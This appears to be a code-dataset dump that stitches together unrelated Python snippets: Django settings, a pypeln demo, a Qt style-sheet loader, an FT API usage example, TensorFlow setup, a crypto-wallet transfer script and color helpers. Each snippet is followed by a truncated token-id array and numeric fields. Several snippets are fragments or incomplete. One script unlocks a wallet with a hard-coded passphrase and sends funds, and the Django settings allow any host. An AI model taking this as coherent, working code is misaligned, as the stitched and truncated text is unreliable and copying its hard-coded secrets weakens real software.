import numpy as np
from countDefense import getDefenseTime
from countSkill import getSkillTime
import warnings
# NOTE(review): suppresses *all* warnings globally -- this also hides
# deprecation warnings; confirm this is intentional.
warnings.filterwarnings("ignore")
# In[2]: | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
220,
198,
11748,
299,
32152,
355,
45941,
198,
6738... | 3.181818 | 77 |
"""
Django settings for votechain project.

Generated by 'django-admin startproject' using Django 3.1.1.

For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
from datetime import timedelta

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# SECURITY WARNING: don't run with debug turned on in production!
# Feature flags are env-driven; only the literal string "True" enables them.
DEBUG = os.getenv("DEBUG", "False") == "True"
TEST = os.getenv("TEST", "False") == "True"
# Presumably toggles mirroring votes to the blockchain backend — confirm
# against the `core` app before relying on this description.
INTEGRATE_BLOCKCHAIN = os.getenv("INTEGRATE_BLOCKCHAIN", "False") == "True"

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get("PRIVATE_KEY", None)
# A missing key is tolerated (with a console warning) only in DEBUG;
# any non-debug start without a key aborts immediately.
if SECRET_KEY is None:
    if DEBUG:
        print("WARNING: Private key is missing")
    else:
        raise EnvironmentError("Private key is missing")

ALLOWED_HOSTS = ['*']

# Cookies only over HTTPS, plus HSTS.
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_HSTS_SECONDS = 2592000  # 30 days, I used ASP.NET default value

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.admindocs',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'corsheaders',
    'rest_framework',
    'drf_yasg',
    'core',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    # NOTE(review): django-cors-headers documents that CorsMiddleware should be
    # placed as high as possible, before CommonMiddleware; listed last it may
    # fail to add CORS headers to some responses — confirm and reorder.
    'corsheaders.middleware.CorsMiddleware',
]

ROOT_URLCONF = 'votechain.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'votechain.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'HOST': os.environ.get('DATABASE_HOST', 'localhost'),
        # Non-standard default port (MySQL usually listens on 3306).
        'PORT': os.environ.get('DATABASE_PORT', '2866'),
        # Test runs always connect as root; otherwise the user comes from env.
        'USER': "root" if TEST else os.environ.get('DATABASE_USER', 'sa'),
        'PASSWORD': os.environ.get('DATABASE_PASSWORD', None),
        'NAME': 'Votechain',
        'AUTOCOMMIT': True,
        'TEST': {
            'NAME': 'test_Votechain',
        },
    }
}

FIXTURE_DIRS = [ './core/fixtures' ]

REST_FRAMEWORK = {
    'DEFAULT_AUTHENTICATION_CLASSES': [
        'rest_framework_simplejwt.authentication.JWTAuthentication'
    ],
    # Dates are exchanged as day-first strings throughout the API.
    'DATE_INPUT_FORMATS': [
        '%d-%m-%Y'
    ],
    'DATETIME_INPUT_FORMATS': [
        '%d-%m-%Y %H:%M:%S'
    ],
    'DATE_FORMAT': '%d-%m-%Y',
    'DATETIME_FORMAT': '%d-%m-%Y %H:%M:%S',
    # Global rate limits: anonymous callers 2 req/s, authenticated 6 req/s.
    'DEFAULT_THROTTLE_CLASSES': [
        'rest_framework.throttling.AnonRateThrottle',
        'rest_framework.throttling.UserRateThrottle'
    ],
    'DEFAULT_THROTTLE_RATES': {
        'anon': '2/second',
        'user': '6/second'
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# JWT lifetimes: short-lived access tokens, 1 h refresh tokens, blacklisted
# on rotation.  Tokens are signed with the site SECRET_KEY (HS256).
SIMPLE_JWT = {
    'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
    'REFRESH_TOKEN_LIFETIME': timedelta(hours=1),
    'ROTATE_REFRESH_TOKENS': False,
    'BLACKLIST_AFTER_ROTATION': True,
    'UPDATE_LAST_LOGIN': False,

    'ALGORITHM': 'HS256',
    'SIGNING_KEY': SECRET_KEY,
    'VERIFYING_KEY': None,
    'AUDIENCE': None,
    'ISSUER': None,

    'AUTH_HEADER_TYPES': ('Bearer',),
    'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',
    'USER_ID_FIELD': 'id',
    'USER_ID_CLAIM': 'user_id',

    'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
    'TOKEN_TYPE_CLAIM': 'token_type',

    'JTI_CLAIM': 'jti',

    'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',
    'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
    'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(hours=1),
}

# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = os.environ.get('TIMEZONE', 'UTC')

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/

STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')

# drf-yasg (Swagger) setup: documents the JWT header scheme used above.
SWAGGER_SETTINGS = {
    'DEFAULT_INFO': 'core.urls.api_info',
    'SECURITY_DEFINITIONS': {
        'JWT': {
            'type': 'apiKey',
            'name': 'AUTHORIZATION',
            'description': 'JWT authentication',
            'in': 'header'
        }
    }
}

# Only the configured frontend origin may make credentialed cross-site calls.
CORS_ORIGIN_WHITELIST = [
    os.getenv('CORS_FRONTEND', 'http://localhost:3000')
]
CORS_ALLOW_CREDENTIALS = True

# Outbound mail over SMTP (Gmail by default), credentials from the environment.
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = os.environ.get('SMTP_SERVER', 'smtp.gmail.com')
# NOTE(review): the default is the int 587 but an SMTP_PORT env value arrives
# as a str — normalize to int for consistency.
EMAIL_PORT = os.environ.get('SMTP_PORT', 587)
EMAIL_HOST_USER = os.environ.get('SMTP_USER', None)
EMAIL_HOST_PASSWORD = os.environ.get('SMTP_PASSWORD', None)
DEFAULT_FROM_EMAIL = EMAIL_HOST_USER
EMAIL_USE_TLS = True
| [
37811,
198,
35,
73,
14208,
6460,
329,
3015,
7983,
1628,
13,
198,
198,
8645,
515,
416,
705,
28241,
14208,
12,
28482,
923,
16302,
6,
1262,
37770,
513,
13,
16,
13,
16,
13,
198,
198,
1890,
517,
1321,
319,
428,
2393,
11,
766,
198,
5450... | 2.21826 | 2,804 |
import pypeln as pl
from copy import copy, deepcopy

# stage = lambda: generator()
# Build a tiny pipeline: each element is incremented in a worker process.
stage = [1, 2, 3]
stage = pl.process.map(lambda x: x + 1, stage)
# stage0 = deepcopy(stage)
# NOTE(review): a pypeln stage is presumably a one-shot iterable — the second
# list(stage) may come back empty (or re-run the pipeline) once the first call
# has consumed it; this script appears to exist to demonstrate exactly that.
print(list(stage))
print(list(stage))
print(pl.Element)
| [
11748,
279,
4464,
45542,
355,
458,
198,
6738,
4866,
1330,
4866,
11,
2769,
30073,
628,
198,
198,
2,
3800,
796,
37456,
25,
17301,
3419,
198,
14247,
796,
685,
16,
11,
362,
11,
513,
60,
198,
14247,
796,
458,
13,
14681,
13,
8899,
7,
50... | 2.752941 | 85 |
'''
Defines -
Sheet: a class representing a style sheet object
with attributes such as path and contents.
get_style_sheets: a function that returns a dictionary
with style sheet names as keys and sheet objects as values.
'''
import os
from qtstyles import errors
class Sheet(object):
    """Lazy wrapper around a Qt style sheet (.qss) file.

    The path is validated eagerly; the file contents are read from disk only
    on first access through the ``contents`` property and cached thereafter.

    >>> import os
    >>> dirpath = os.path.dirname(os.path.abspath(__file__))
    >>> path = os.path.join(dirpath, "style_sheets", "default.qss")
    >>> sheet = Sheet(path)
    >>> isinstance(sheet.contents, str)
    True
    """

    def __init__(self, path):
        """Validate and remember ``path``, a file name ending in '.qss'."""
        # Validation order matters for which error callers observe first:
        # wrong type, then wrong extension, then missing file.
        if not isinstance(path, str):
            raise errors.SheetPathTypeError
        if not path.endswith(".qss"):
            raise errors.SheetPathValueError
        if not os.path.isfile(path):
            raise errors.SheetPathFileDoesntExist
        self._path = path
        self._contents = None  # populated lazily by `contents`

    @property
    def path(self):
        """The style sheet file path this object was constructed with."""
        return self._path

    @property
    def contents(self):
        """Style sheet text, read from disk on first access only."""
        if self._contents is None:
            self._load_contents()
        return self._contents

    def _load_contents(self):
        """Read the sheet file into the in-memory cache."""
        with open(self._path, "r") as handle:
            self._contents = handle.read()
def get_style_sheets():
    """Map style sheet names to their Sheet objects.

    Scans the package's ``style_sheets`` directory and returns a dict keyed
    by file name with the '.qss' suffix stripped.  Entries whose name
    contains a double underscore (e.g. __init__, __pycache__) are skipped.
    A sheet called 'default' is expected to exist.

    >>> sheets = get_style_sheets()
    >>> isinstance(sheets, dict) # returns a dictionary
    True
    >>> sheet_object = sheets["default"]
    >>> sheet_object.path.endswith(".qss")
    True
    """
    sheet_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                             "style_sheets")
    return {
        name.replace(".qss", ""): Sheet(os.path.join(sheet_dir, name))
        for name in os.listdir(sheet_dir)
        if "__" not in name  # drop __init__, __pycache__ and friends
    }
| [
7061,
6,
201,
198,
7469,
1127,
532,
201,
198,
201,
198,
3347,
316,
25,
257,
1398,
10200,
257,
3918,
9629,
2134,
201,
198,
4480,
12608,
884,
355,
3108,
290,
10154,
13,
201,
198,
201,
198,
1136,
62,
7635,
62,
42011,
25,
257,
2163,
3... | 2.427083 | 1,056 |
from r1 import check,time
import r2
# Python 2 script: ask whether the person is a man or a woman and enqueue the
# `check` job on the matching queue (men -> r2.q1, women -> r2.q2).
print "Please check either the person is men or women(m/w)"
s = raw_input()
if(s== 'm'):
    result = r2.q1.enqueue(check, s)
else:
    # NOTE(review): any input other than 'm' (not just 'w') falls through here.
    result = r2.q2.enqueue(check, s)
| [
6738,
374,
16,
1330,
2198,
11,
2435,
198,
11748,
374,
17,
198,
198,
4798,
366,
5492,
2198,
2035,
262,
1048,
318,
1450,
393,
1466,
7,
76,
14,
86,
16725,
198,
82,
796,
8246,
62,
15414,
3419,
198,
361,
7,
82,
855,
705,
76,
6,
2599,... | 2.252632 | 95 |
from django.core.management.base import BaseCommand
from django.core.files.storage import get_storage_class
from cast.utils import storage_walk_paths
| [
6738,
42625,
14208,
13,
7295,
13,
27604,
13,
8692,
1330,
7308,
21575,
198,
6738,
42625,
14208,
13,
7295,
13,
16624,
13,
35350,
1330,
651,
62,
35350,
62,
4871,
198,
198,
6738,
3350,
13,
26791,
1330,
6143,
62,
11152,
62,
6978,
82,
628
] | 3.619048 | 42 |
from .parsing import main_parser
from .time_tracking import start, stop, week, day, current, toggle

if __name__ == "__main__":
    # Route the parsed sub-command to its handler.  Unrecognised actions are
    # silently ignored, exactly as in the original if-chain.
    args = main_parser.parse_args()
    handlers = {
        "start": start,
        "stop": stop,
        "current": current,
        "day": day,
        "week": week,
        "toggle": toggle,
    }
    handler = handlers.get(args.action)
    if handler is not None:
        handler()
6738,
764,
79,
945,
278,
1330,
1388,
62,
48610,
198,
6738,
764,
2435,
62,
36280,
1330,
923,
11,
2245,
11,
1285,
11,
1110,
11,
1459,
11,
19846,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
... | 2.583784 | 185 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dateutil import parser
from pytest import approx
import sys
# Make the parent directory importable so `dependencies` resolves when this
# test file is executed directly from its own folder.
sys.path.append('..')
from dependencies.commitment_intervals import compute_diff, ScheduleAndValue, CommitmentValue
| [
2,
15069,
12131,
3012,
11419,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921,
743,
733... | 3.84 | 200 |
# from ifm import Enum
import pandas as pd
| [
2,
422,
611,
76,
1330,
2039,
388,
198,
11748,
19798,
292,
355,
279,
67,
198
] | 2.866667 | 15 |
# Walk-through / usage example for the pyFT wrapper around the FT Search API.
# Each "#PRINT:" comment below shows the output expected from the call above it.
import pyFT

#Comment these line and uncomment the next one to use your own API key
with open('apiKey','r') as f:
    apiKey = f.read()
#apiKey =

#Initialize the FTRequest object using your developer key
request = pyFT.FTRequest(apiKey)

#For the main part of your query, you can either set it directly:
request.customQuery("banks")
print(request._build()) #This lines print the body of the html message to stdout
#PRINT: {"queryString":"banks"}

#Or you can use the FTQuerySyntax objects:
# `-` is AND NOT, `+` is OR, `*` is AND (see the evaluate() output below).
query = (pyFT.FTBasic("banks") - pyFT.FTBasic("equity")) + pyFT.FTBasic("finance") * pyFT.FTBasic("credit")
print(query.evaluate())
#PRINT: ((banks AND (NOT equity)) OR (finance AND credit))
#You can then add it to your FTRequest:
request.builtQuery(query)

#To look for particular media, you can use the addCurations method:
request.addCurations(["ARTICLES","BLOGS"])
#The list of allowed curations is available here:
print("Curations: " + ", ".join(pyFT.curations))
#Any other input except an empty string will result in a pyFT.FTError.FTException being raised

#Some fields such as the uuid of the page is automatically sent by the API
#For the most interesting field, you have to specify that you want them to be returned using the 'aspects' field:
request.addAspects(['title','summary','location'])
#Authorized aspects are set here:
print("Aspects: " + ", ".join(pyFT.aspects))

#Some resultContext fields can be set using methods from the FTRequest class:
request.addSortQuery('lastPublishDateTime',DESC=False)
#Here is a list of sortable fields:
print("Sortable: " + ", ".join(pyFT.sortable))

#Not all available fields from the API have their own method.
#They will be implemented little by little, but in the meantime, you can use the addGenericResultContext method
request.addGenericResultContext('maxResults',10,isNumeric=True) #Some generic (i.e. not built-in of the wrapper) result context

#Note that if you are working in the Python interpreter and you want to make sure that your request is correct before sending it, you can print it with the _build method:
print(request._build())
#PRINT: {"queryString":"((banks AND (NOT equity)) OR (finance AND credit))","queryContext":{"curations":["ARTICLES","BLOGS"]},"resultContext":{"sortOrder":"ASC","sortField":"lastPublishDateTime","aspects":["title","summary"],"maxResults":10}}

#Once you are happy with your request, you can call the getResults method:
result = request.getResults()
#This will send you back a HTTPResponse from the httplib library
print(result)
#<http.client.HTTPResponse object at 0xb6ebdbac>

#At this stage, you can either wrap your own class to use the results
#Or you can use the FTResponse class:
FT_ARTICLES = pyFT.FTResponse(result)
#If needed, this class stores your request:
print(FT_ARTICLES.query)
#Print the query
#The results are stored as a list of json instance:
#NB: not a json instance with a list in it
print(FT_ARTICLES.results)
"""
PRINT: (using the __repr__ method)
[Title: FT interview transcript: Robert Zoellick
, Title: Lloyds reveals £201m credit hit
, Title: CDS update: Fundamentally pessimistic
, Title: 'My social life never stops'
, Title: US authorities in Iraq probe phone contracts
, Title: Jonathan Guthrie: Offshoring will hurt
, Title: John Kay: Customer inertia and the active shopper
, Title: ABB names Sulzer boss as new chief executive
, Title: Travel bears brunt of losses
, Title: Measured confidence takes over
]
"""
#Some method will come later. For now, you can return the html link to the article:
print(FT_ARTICLES.results[0].makeHTMLhref('webapp','MyCompany',campaignParameter=True))
#PRINT: http://www.ft.com/cms/be4c9c30-dfef-11de-9d40-00144feab49a.html?FTCamp=engage/CAPI/webapp/Channel_MyCompany//B2B
#If you do not need the campaign parameter (e.g. for test), you can always switch it off
#Warning: this only work if you had the 'location' aspect
print(FT_ARTICLES.results[0].makeHTMLhref('Not','used',campaignParameter=False))
#PRINT: http://www.ft.com/cms/s/0/be4c9c30-dfef-11de-9d40-00144feab49a.html
| [
11748,
12972,
9792,
198,
198,
2,
21357,
777,
1627,
290,
8820,
434,
262,
1306,
530,
284,
779,
534,
898,
7824,
1994,
198,
4480,
1280,
10786,
15042,
9218,
41707,
81,
11537,
355,
277,
25,
198,
220,
220,
220,
40391,
9218,
796,
277,
13,
9... | 3.345199 | 1,208 |
# Notes (translated from Turkish — original: "Sevgilime Notlar"):
# - Increase the reward gradually / step by step.
# - Put line 47 into the presentation; the pixel changes between states are
#   relative to the snake.
import tensorflow as tf
import os
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Flatten, BatchNormalization, \
    ZeroPadding2D, Dropout
from tensorflow.keras.models import Sequential, load_model
from tensorflow.keras.optimizers import Adam
# from tensorflow.keras.utils import plot_model
import numpy as np

# Start from a clean graph and fall back to TF1-style graph execution
# (required for the Session/run sanity check below).
tf.keras.backend.clear_session()
tf.compat.v1.disable_eager_execution()
# Smoke test that the TF installation works.
hello = tf.constant('Hello, TensorFlow!')
sess = tf.compat.v1.Session()
print(sess.run(hello))

# def build_ddqn(lr, n_actions, conv1_dims, conv2_dims, input_dims):
#     model = Sequential([
#         ZeroPadding2D(padding=(2, 2)),
#         Conv2D(conv1_dims, kernel_size=(4, 4), strides=(2, 2), padding="valid", input_shape=input_dims),
#         BatchNormalization(),
#         Activation('relu'),
#         MaxPooling2D(pool_size=(4, 4), strides=(2, 2), padding='same'),
#         ZeroPadding2D(padding=(1, 1)),
#         Conv2D(conv2_dims, kernel_size=(2, 2), strides=(1, 1), padding="valid"),
#         BatchNormalization(),
#         Activation('relu'),
#         MaxPooling2D(pool_size=(2, 2), strides=(1, 1), padding='same'),
#         Flatten(),
#         Dense(256, activation='relu'),
#         Dense(n_actions, activation='relu')
#     ])
#
#     model.compile(optimizer=Adam(lr=lr), loss='mse')
#     return model

# Loading the weights file (translated from Turkish: "Weights dosyası yükleme")
| [
2,
37918,
37718,
524,
1892,
21681,
25,
198,
2,
6721,
9116,
479,
36920,
43733,
267,
21681,
461,
610,
926,
30102,
26224,
461,
13,
198,
2,
3825,
7487,
6298,
13,
3332,
30102,
81,
30102,
479,
726,
1181,
1754,
67,
39548,
17465,
390,
33133,
... | 2.287234 | 658 |
# Generated by Django 3.1.3 on 2020-11-14 15:51
from django.db import migrations, models
| [
2,
2980,
515,
416,
37770,
513,
13,
16,
13,
18,
319,
12131,
12,
1157,
12,
1415,
1315,
25,
4349,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
628
] | 2.84375 | 32 |
# Copyright 2021 The Private Cardinality Estimation Framework Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for halo_simulator.py."""
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from unittest.mock import patch
from dataclasses import dataclass
from wfa_cardinality_estimation_evaluation_framework.estimators.base import (
EstimateNoiserBase,
)
from wfa_planning_evaluation_framework.data_generators.data_set import DataSet
from wfa_planning_evaluation_framework.data_generators.publisher_data import (
PublisherData,
)
from wfa_planning_evaluation_framework.models.reach_point import ReachPoint
from wfa_planning_evaluation_framework.simulator.halo_simulator import (
HaloSimulator,
MAX_ACTIVE_PUBLISHERS,
)
from wfa_planning_evaluation_framework.simulator.publisher import Publisher
from wfa_planning_evaluation_framework.simulator.privacy_tracker import (
PrivacyBudget,
PrivacyTracker,
NoisingEvent,
DP_NOISE_MECHANISM_DISCRETE_LAPLACE,
)
from wfa_planning_evaluation_framework.simulator.system_parameters import (
LiquidLegionsParameters,
SystemParameters,
)
# NOTE(review): the original source had a bare `@dataclass` decorator here with
# no class definition following it, which is a SyntaxError — the decorated
# class appears to have been lost.  The stray decorator is removed so the
# module can be imported at all; restore the missing dataclass from version
# control if it is still needed.

if __name__ == "__main__":
    # Run all absltest test cases defined in this module.
    absltest.main()
| [
2,
15069,
33448,
383,
15348,
25564,
414,
10062,
18991,
25161,
46665,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
... | 3.232775 | 537 |
import math
from typing import Union
import torch
from torch import autograd, nn
| [
11748,
10688,
198,
6738,
19720,
1330,
4479,
198,
198,
11748,
28034,
198,
6738,
28034,
1330,
1960,
519,
6335,
11,
299,
77,
628,
198
] | 3.652174 | 23 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from datetime import datetime, timedelta
import time
import io
import logging
from crea.blockchain import Blockchain
from crea.block import Block
from crea.account import Account
from crea.amount import Amount
from creagraphenebase.account import PasswordKey, PrivateKey, PublicKey
from crea.crea import Crea
from crea.utils import parse_time, formatTimedelta
from creaapi.exceptions import NumRetriesReached
from crea.nodelist import NodeList
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
if __name__ == "__main__":
    # stm = Crea(node="https://testnet.timcliff.com/")
    # stm = Crea(node="https://testnet.creaitdev.com")
    # Connect to a public mainnet node (testnet alternatives kept above).
    stm = Crea(node="https://nodes.creary.net")
    # NOTE(review): wallet passphrase is hard-coded; anything committed to the
    # repo should be considered leaked — read it from the environment instead.
    stm.wallet.unlock(pwd="pwd123")
    account = Account("creabot", crea_instance=stm)
    # Print current voting power, then send 0.001 CBD to holger80, memo "test".
    print(account.get_voting_power())
    account.transfer("holger80", 0.001, "CBD", "test")
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
198,
11748,
25064,
198,
6738,
... | 3.023055 | 347 |
import nodeClass
| [
11748,
10139,
9487,
201,
198,
201,
198,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220
] | 1.764706 | 17 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from behavioral_patterns.strategy.hand_signal import get_hand, HandSignal
from behavioral_patterns.strategy.strategy import Strategy
# ˄
# Mirror Strategy: showing a hand signal from the previous opponent's hand signal.
# ˅
# ˄
# ˅
# ˄
# ˅
# ˄
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
220,
135,
227,
198,
6738,
17211,
62,
33279,
82,
13,
2536,
4338,
13,
4993,
62,
12683,
282,
1330,
651,
62,
4993,
1... | 2.302817 | 142 |
# Package version, exposed as a plain string.
version_str = '0.1.2'
| [
9641,
62,
2536,
796,
705,
15,
13,
16,
13,
17,
6,
198
] | 1.833333 | 12 |
#Analyze performeace by Return Breakdown (xy), Annualized_std_dev, Average Annual Return, Sharpe_ratio, BTC_Beta (30d rolling average)
#Return Daily, Cumulative and Overall Summary Matrix
#Author: Ken Lee 2022.02.22
# Import Modules
import pandas as pd
import os
import json
import requests
from dotenv import load_dotenv
import matplotlib.pyplot as plt
import alpaca_trade_api as tradeapi
from pathlib import Path
import sqlalchemy as sql
import CryptoDownloadData as hist
from datetime import date
import logging
from dateutil.relativedelta import relativedelta
import numpy as np
from datetime import date
from datetime import datetime
# SQLAlchemy connection URL for the local SQLite crypto price database.
crypto_data_connection_string = 'sqlite:///./Reference/crypto.db'
| [
2,
37702,
2736,
1620,
68,
558,
416,
8229,
12243,
2902,
357,
5431,
828,
16328,
1143,
62,
19282,
62,
7959,
11,
13475,
16328,
8229,
11,
15465,
431,
62,
10366,
952,
11,
14503,
62,
43303,
357,
1270,
67,
10708,
2811,
8,
198,
2,
13615,
671... | 3.497537 | 203 |
from glycan_profiling.task import TaskBase
from .chromatogram import (get_chromatogram, mask_subsequence)
from .index import ChromatogramFilter
# Module-level alias for the pruning helper.
# NOTE(review): MassShiftTreePruner is not imported in this chunk — presumably
# defined or imported elsewhere in the module; confirm before relying on it.
prune_bad_mass_shift_branches = MassShiftTreePruner.prune_bad_mass_shift_branches
| [
6738,
13874,
5171,
62,
5577,
4386,
13,
35943,
1330,
15941,
14881,
198,
198,
6738,
764,
28663,
265,
21857,
1330,
357,
1136,
62,
28663,
265,
21857,
11,
9335,
62,
7266,
43167,
8,
198,
6738,
764,
9630,
1330,
18255,
265,
21857,
22417,
628,
... | 3.108108 | 74 |
'''tools for getting (sometimes astrophysically relevant) plotting colors'''
import colormath.color_objects
import colormath.color_conversions
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.colors as co
def name2color(name):
    """Return the 3-element RGB tuple for a color name or '#rrggbb' string.

    Hex strings are passed straight through; anything else is first looked
    up in matplotlib's named-color table.
    """
    hex_code = name if '#' in name else co.cnames[name].lower()
    return co.hex2color(hex_code)
def nm2rgb(inputnm, intensity=1.0):
    """Convert a wavelength in nm (or a [lo, hi] range) to an (r, g, b) tuple.

    Wavelengths at or beyond the rough visible window (<= 350 nm or
    >= 800 nm) map to black.  Otherwise a crude spectral energy distribution
    is built on a 10 nm grid and handed to colormath for the sRGB transform.
    """
    # Outside the visible window: render as black.
    if np.min(inputnm) <= 350.0 or np.max(inputnm) >= 800.0:
        return 0, 0, 0
    # 50 samples on a 10 nm grid (340-830 nm), one per SpectralColor argument.
    grid = np.arange(340.0, 840.0, 10.0)
    sed = np.zeros_like(grid)
    # Snap the requested wavelength(s) to the grid, then light up every bin
    # from the smallest to the largest requested wavelength (a single value
    # lights exactly one bin).
    snapped = np.round(np.array(inputnm) / 10.0) * 10.0
    lit = (grid >= np.min(snapped)) & (grid <= np.max(snapped))
    # Empirical scaling — the absolute units SpectralColor expects are unclear
    # (see original author's note); `intensity` is spread evenly over the bins.
    sed[lit] = 5.0 / np.sum(lit) * intensity
    spectral = colormath.color_objects.SpectralColor(*sed)
    rgb = colormath.color_conversions.convert_color(spectral, colormath.color_objects.sRGBColor)
    return rgb.clamped_rgb_r, rgb.clamped_rgb_g, rgb.clamped_rgb_b
def monochromaticdemo():
    """Visual smoke test of nm2rgb for single wavelengths.

    Top panel: the r/g/b channel curves across 340-1000 nm.
    Bottom panel: random scatter points tinted by their wavelength's color.
    """
    num_points = 1000
    wavelengths = np.linspace(340, 1000, num_points)
    swatches = [nm2rgb(w) for w in wavelengths]
    plt.ion()
    figure, (channel_ax, scatter_ax) = plt.subplots(2, 1, sharex=True)
    # One curve per color channel, drawn in that channel's own color.
    for channel, line_color in enumerate(('red', 'green', 'blue')):
        channel_ax.plot(wavelengths, [s[channel] for s in swatches], color=line_color)
    scatter_ax.scatter(wavelengths, np.random.normal(0, 1, num_points), color=swatches, s=100)
    scatter_ax.set_xlim(min(wavelengths), max(wavelengths))
    scatter_ax.set_xlabel('Wavelength (nm)')
def broadbanddemo(width=50):
    """Visual smoke test of nm2rgb for wavelength ranges.

    Each sample covers [center - width, center + width] nm, showing how
    broadband light washes the colors out compared to monochromaticdemo.

    Args:
        width: half-width in nm of the band around each center wavelength.
    """
    n = 1000
    x = np.linspace(340, 1000, n)
    colors = [nm2rgb([c - width, c + width]) for c in x]
    plt.ion()
    # Bug fix: the original called plt.cla() here, before the new figure was
    # created — that only cleared the current axes of whatever unrelated
    # figure happened to be active, so the stray call is removed.
    fi, ax = plt.subplots(2, 1, sharex=True)
    ax[0].plot(x, [c[0] for c in colors], color='red')
    ax[0].plot(x, [c[1] for c in colors], color='green')
    ax[0].plot(x, [c[2] for c in colors], color='blue')
    ax[1].scatter(x, np.random.normal(0, 1, n), color=colors, s=100)
    ax[1].set_xlim(min(x), max(x))
    # Consistency with monochromaticdemo: label the shared x axis.
    ax[1].set_xlabel('Wavelength (nm)')
| [
7061,
6,
31391,
329,
1972,
357,
29810,
48782,
893,
1146,
5981,
8,
29353,
7577,
7061,
6,
198,
198,
11748,
951,
579,
776,
13,
8043,
62,
48205,
198,
11748,
951,
579,
776,
13,
8043,
62,
1102,
47178,
198,
11748,
2603,
29487,
8019,
13,
90... | 2.415155 | 937 |
